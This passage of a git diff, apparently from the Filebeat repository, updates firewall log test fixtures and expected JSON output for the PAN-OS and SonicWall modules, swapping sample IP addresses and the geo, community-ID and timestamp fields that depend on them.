-        "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:19.000-02:00",
         "event.timezone": "-02:00",
@@ -10654,12 +10359,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 44593,
+        "log.offset": 45143,
         "network.application": "dns",
         "network.bytes": 242,
         "network.community_id": [
-            "1:+zC2Y+UE7UqApr01oqb755Xyuf4=",
-            "1:mci4o+GZJDLvZr11UdJH9bepPqU="
+            "1:4RiaH+n0JwxG6zcL26BuXxb9VkY=",
+            "1:tMlsHUEsYDQ3Vv3JAJSu15cqkNE="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -10676,12 +10381,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24243",
-        "panw.panos.network.nat.community_id": "1:+zC2Y+UE7UqApr01oqb755Xyuf4=",
+        "panw.panos.network.nat.community_id": "1:tMlsHUEsYDQ3Vv3JAJSu15cqkNE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091208,
         "panw.panos.source.interface": "ethernet1/2",
@@ -10696,14 +10401,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 170,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -10728,17 +10433,18 @@
         "client.nat.port": 22446,
         "client.packets": 1,
         "client.port": 9799,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 94,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -10752,7 +10458,7 @@
         "event.end": "2018-11-30T16:09:19.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:19.000-02:00",
         "event.timezone": "-02:00",
@@ -10764,12 +10470,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 45041,
+        "log.offset": 45601,
         "network.application": "dns",
         "network.bytes": 172,
         "network.community_id": [
-            "1:Px8uRfOgVDuaWj/VKxjTwyAzHAM=",
-            "1:xawqUBgLyfe1E61ObEXv4nbO590="
+            "1:IyD4gx5qjpc1VEbcmilQaH5vo9E=",
+            "1:NmuHySRLQ/6iGfMvm+qs/a2Nrpc="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -10786,12 +10492,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24077",
-        "panw.panos.network.nat.community_id": "1:xawqUBgLyfe1E61ObEXv4nbO590=",
+        "panw.panos.network.nat.community_id": "1:NmuHySRLQ/6iGfMvm+qs/a2Nrpc=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091209,
         "panw.panos.source.interface": "ethernet1/2",
@@ -10806,14 +10512,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 94,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -10838,17 +10544,18 @@
         "client.nat.port": 22301,
         "client.packets": 1,
         "client.port": 39169,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 94,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -10862,7 +10569,7 @@
         "event.end": "2018-11-30T16:09:19.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:19.000-02:00",
         "event.timezone": "-02:00",
@@ -10874,12 +10581,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 45488,
+        "log.offset": 46058,
         "network.application": "dns",
         "network.bytes": 172,
         "network.community_id": [
-            "1:6tSek5GUc9k56LSY4NgTMd0igd8=",
-            "1:PDWWOeDVqKGZ/hwjVVdCDdF6qB4="
+            "1:CdL6dWgT+IMFe6ptUk1vLlpVL20=",
+            "1:lzFOPce/GJbHM86icsI0NMzcEUg="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -10896,12 +10603,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24266",
-        "panw.panos.network.nat.community_id": "1:PDWWOeDVqKGZ/hwjVVdCDdF6qB4=",
+        "panw.panos.network.nat.community_id": "1:lzFOPce/GJbHM86icsI0NMzcEUg=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091210,
         "panw.panos.source.interface": "ethernet1/2",
@@ -10916,14 +10623,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 94,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -10948,17 +10655,18 @@
         "client.nat.port": 58124,
         "client.packets": 1,
         "client.port": 42476,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 166,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -10972,7 +10680,7 @@
         "event.end": "2018-11-30T16:09:19.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:19.000-02:00",
         "event.timezone": "-02:00",
@@ -10984,12 +10692,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 45936,
+        "log.offset": 46516,
         "network.application": "dns",
         "network.bytes": 238,
         "network.community_id": [
-            "1:xl0u/+SYGciPtyPuv813G1aTEdI=",
-            "1:yNIHAg1M08IChho9000mtg7zUOc="
+            "1:GHuJcKZG3OiYe6oybi/KhmMCXwk=",
+            "1:J9zizMWz2sU5dX8BXgKIQbfXqFU="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -11006,12 +10714,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24269",
-        "panw.panos.network.nat.community_id": "1:yNIHAg1M08IChho9000mtg7zUOc=",
+        "panw.panos.network.nat.community_id": "1:GHuJcKZG3OiYe6oybi/KhmMCXwk=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091211,
         "panw.panos.source.interface": "ethernet1/2",
@@ -11026,14 +10734,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 166,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
diff --git a/x-pack/filebeat/module/panw/panos/test/traffic_nanos_time.log-expected.json b/x-pack/filebeat/module/panw/panos/test/traffic_nanos_time.log-expected.json
index 72ffebe6db72..052e18627569 100644
--- a/x-pack/filebeat/module/panw/panos/test/traffic_nanos_time.log-expected.json
+++ b/x-pack/filebeat/module/panw/panos/test/traffic_nanos_time.log-expected.json
@@ -1,6 +1,6 @@
 [
     {
-        "@timestamp": "2021-05-26T16:26:47.000Z",
+        "@timestamp": "2021-05-26T14:26:47.000-02:00",
         "client.bytes": 1696,
         "client.ip": "127.0.0.0",
         "client.nat.ip": "0.0.0.0",
@@ -21,12 +21,12 @@
         ],
         "event.dataset": "panw.panos",
         "event.duration": 1000000000,
-        "event.end": "2021-05-26T16:26:31.000Z",
+        "event.end": "2021-05-26T14:26:31.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
         "event.original": "Oct 30 09:46:42 1,2021-05-26T16:27:07.000000Z,no-serial,TRAFFIC,end,9.1,2021-05-26T16:26:47.000000Z,127.0.0.0,127.0.0.1,0.0.0.0,0.0.0.0,intrazone-default,,,web-browsing,vsys1,untrust,untrust,ethernet1/1,ethernet1/1,Cortex Data Lake,,688290,1,35834,443,35834,20077,0x1400070,tcp,allow,7291,1696,5595,21,2021-05-26T16:26:30.000000Z,1,medium-risk,,620386,0x8800000000000000,US,SG,,14,7,tcp-fin,22,18,0,0,,GP cloud service,from-policy,,,0,,0,1970-01-01T00:00:00.000000Z,N/A,0,0,0,0,6a2f6161-88f2-4afc-8dd5-256bc4505a64,0,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",
         "event.outcome": "success",
-        "event.start": "2021-05-26T16:26:30.000Z",
+        "event.start": "2021-05-26T14:26:30.000-02:00",
         "event.timezone": "-02:00",
         "event.type": [
             "allowed",
diff --git a/x-pack/filebeat/module/sonicwall/firewall/test/general.log b/x-pack/filebeat/module/sonicwall/firewall/test/general.log
index 41f778c72f3e..bebffc65961d 100644
--- a/x-pack/filebeat/module/sonicwall/firewall/test/general.log
+++ b/x-pack/filebeat/module/sonicwall/firewall/test/general.log
@@ -1,21 +1,21 @@
-Jan  3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:06" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23419 src=2.2.2.2:36701:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000
-Jan  3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:07" fw=1.1.1.1 pri=1 c=32 m=30 msg="Administrator login denied due to bad credentials" n=7 src=2.2.2.2:36701:WAN dst=1.1.1.1:50000:WAN
-Jan  3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:07" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23420 src=2.2.2.2:36702:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000
-Jan  3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:07" fw=1.1.1.1 pri=6 c=1024 m=537 msg="Connection Closed" n=567996 src=192.168.4.10:27577:WAN dst=192.168.5.10:53:LAN proto=tcp/dns sent=257 rcvd=242
-Jan  3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:08" fw=1.1.1.1 pri=6 c=1024 m=537 msg="Connection Closed" n=567997 src=192.168.5.56:4277:LAN dst=192.168.1.100:1026:WAN proto=tcp/1026 sent=3590 rcvd=13042 vpnpolicy="name"
-Jan  3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:10" fw=1.1.1.1 pri=6 c=1024 m=537 msg="Connection Closed" n=567999 src=192.168.5.56:4280:LAN dst=192.168.2.81:41850:WAN proto=tcp/41850 sent=386026 rcvd=454118 vpnpolicy="name"
-Jan  3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:10" fw=1.1.1.1 pri=6 c=1024 m=537 msg="Connection Closed" n=567999 src=1.1.1.1:500:WAN dst=2.2.2.2:500:WAN proto=udp/500 sent=344 rcvd=152
-Jan  3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:10" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23421 src=2.2.2.2:36703:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000
-Jan  3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:10" fw=1.1.1.1 pri=1 c=32 m=30 msg="Administrator login denied due to bad credentials" n=8 src=2.2.2.2:36703:WAN dst=1.1.1.1:50000:WAN
-Jan  3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:11" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23422 src=2.2.2.2:36704:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000
-Jan  3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:14" fw=1.1.1.1 pri=5 c=256 m=38 msg="ICMP packet dropped" n=22070 src=219.89.19.223:1026:WAN dst=1.1.1.1:6822:WAN  type=3 code=3
-Jan  3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:14" fw=1.1.1.1 pri=6 c=1024 m=537 msg="Connection Closed" n=568000 src=219.89.19.223:1026:WAN dst=1.1.1.1:0:WAN proto=udp/0
-Jan  3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:15" fw=1.1.1.1 pri=6 c=16 m=346 msg="IKE Initiator: Start Quick Mode (Phase 2)." n=171872 src=2.2.2.2:500 dst=1.1.1.1:500
-Jan  3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:15" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23423 src=1.1.1.1:500:WAN dst=2.2.2.2:500:WAN proto=udp/500
-Jan  3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:15" fw=1.1.1.1 pri=4 c=16 m=483 msg="Received notify: INVALID_ID_INFO" n=171625 src=2.2.2.2:500 dst=1.1.1.1:500
-Jan  3 13:45:45 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:15" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23424 src=192.168.115.10:11549:WAN dst=192.168.5.10:53:LAN proto=tcp/dns
-Jan  3 13:45:46 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:17" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23425 src=192.168.5.64:3182:LAN dst=192.168.1.100:445:WAN proto=tcp/445
-Jan  3 13:45:47 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:18" fw=1.1.1.1 pri=6 c=1024 m=537 msg="Connection Closed" n=568001 src=2.2.2.2:36699:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000 sent=1557 rcvd=957
-Jan  3 13:45:49 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:20" fw=1.1.1.1 pri=6 c=1024 m=537 msg="Connection Closed" n=568002 src=192.168.5.10:3417:LAN dst=192.168.1.100:53:WAN proto=udp/dns sent=401 rcvd=254 vpnpolicy="name"
-Jan  3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:20" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23426 src=192.168.125.75:524:WAN dst=192.168.5.10:3582:LAN proto=udp/3582
-Jan  3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:21" fw=1.1.1.1 pri=6 c=262144 m=98 msg="Connection Opened" n=23427 src=192.168.6.10:28503:WAN dst=192.168.5.10:53:LAN proto=tcp/dns
+Jan  3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:06" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23419 src=2.2.2.2:36701:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000
+Jan  3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:07" fw=89.160.20.156 pri=1 c=32 m=30 msg="Administrator login denied due to bad credentials" n=7 src=2.2.2.2:36701:WAN dst=89.160.20.156:50000:WAN
+Jan  3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:07" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23420 src=2.2.2.2:36702:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000
+Jan  3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:07" fw=89.160.20.156 pri=6 c=1024 m=537 msg="Connection Closed" n=567996 src=192.168.4.10:27577:WAN dst=192.168.5.10:53:LAN proto=tcp/dns sent=257 rcvd=242
+Jan  3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:08" fw=89.160.20.156 pri=6 c=1024 m=537 msg="Connection Closed" n=567997 src=192.168.5.56:4277:LAN dst=192.168.1.100:1026:WAN proto=tcp/1026 sent=3590 rcvd=13042 vpnpolicy="name"
+Jan  3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:10" fw=89.160.20.156 pri=6 c=1024 m=537 msg="Connection Closed" n=567999 src=192.168.5.56:4280:LAN dst=192.168.2.81:41850:WAN proto=tcp/41850 sent=386026 rcvd=454118 vpnpolicy="name"
+Jan  3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:10" fw=89.160.20.156 pri=6 c=1024 m=537 msg="Connection Closed" n=567999 src=89.160.20.156:500:WAN dst=2.2.2.2:500:WAN proto=udp/500 sent=344 rcvd=152
+Jan  3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:10" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23421 src=2.2.2.2:36703:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000
+Jan  3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:10" fw=89.160.20.156 pri=1 c=32 m=30 msg="Administrator login denied due to bad credentials" n=8 src=2.2.2.2:36703:WAN dst=89.160.20.156:50000:WAN
+Jan  3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:11" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23422 src=2.2.2.2:36704:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000
+Jan  3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:14" fw=89.160.20.156 pri=5 c=256 m=38 msg="ICMP packet dropped" n=22070 src=219.89.19.223:1026:WAN dst=89.160.20.156:6822:WAN  type=3 code=3
+Jan  3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:14" fw=89.160.20.156 pri=6 c=1024 m=537 msg="Connection Closed" n=568000 src=219.89.19.223:1026:WAN dst=89.160.20.156:0:WAN proto=udp/0
+Jan  3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:15" fw=89.160.20.156 pri=6 c=16 m=346 msg="IKE Initiator: Start Quick Mode (Phase 2)." n=171872 src=2.2.2.2:500 dst=89.160.20.156:500
+Jan  3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:15" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23423 src=89.160.20.156:500:WAN dst=2.2.2.2:500:WAN proto=udp/500
+Jan  3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:15" fw=89.160.20.156 pri=4 c=16 m=483 msg="Received notify: INVALID_ID_INFO" n=171625 src=2.2.2.2:500 dst=89.160.20.156:500
+Jan  3 13:45:45 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:15" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23424 src=192.168.115.10:11549:WAN dst=192.168.5.10:53:LAN proto=tcp/dns
+Jan  3 13:45:46 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:17" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23425 src=192.168.5.64:3182:LAN dst=192.168.1.100:445:WAN proto=tcp/445
+Jan  3 13:45:47 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:18" fw=89.160.20.156 pri=6 c=1024 m=537 msg="Connection Closed" n=568001 src=2.2.2.2:36699:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000 sent=1557 rcvd=957
+Jan  3 13:45:49 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:20" fw=89.160.20.156 pri=6 c=1024 m=537 msg="Connection Closed" n=568002 src=192.168.5.10:3417:LAN dst=192.168.1.100:53:WAN proto=udp/dns sent=401 rcvd=254 vpnpolicy="name"
+Jan  3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:20" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23426 src=192.168.125.75:524:WAN dst=192.168.5.10:3582:LAN proto=udp/3582
+Jan  3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time="2007-01-03 14:48:21" fw=89.160.20.156 pri=6 c=262144 m=98 msg="Connection Opened" n=23427 src=192.168.6.10:28503:WAN dst=192.168.5.10:53:LAN proto=tcp/dns
diff --git a/x-pack/filebeat/module/sonicwall/firewall/test/general.log-expected.json b/x-pack/filebeat/module/sonicwall/firewall/test/general.log-expected.json
index 60a16bb95489..7ea2067409d9 100644
--- a/x-pack/filebeat/module/sonicwall/firewall/test/general.log-expected.json
+++ b/x-pack/filebeat/module/sonicwall/firewall/test/general.log-expected.json
@@ -4,11 +4,11 @@
         "event.code": "98",
         "event.dataset": "sonicwall.firewall",
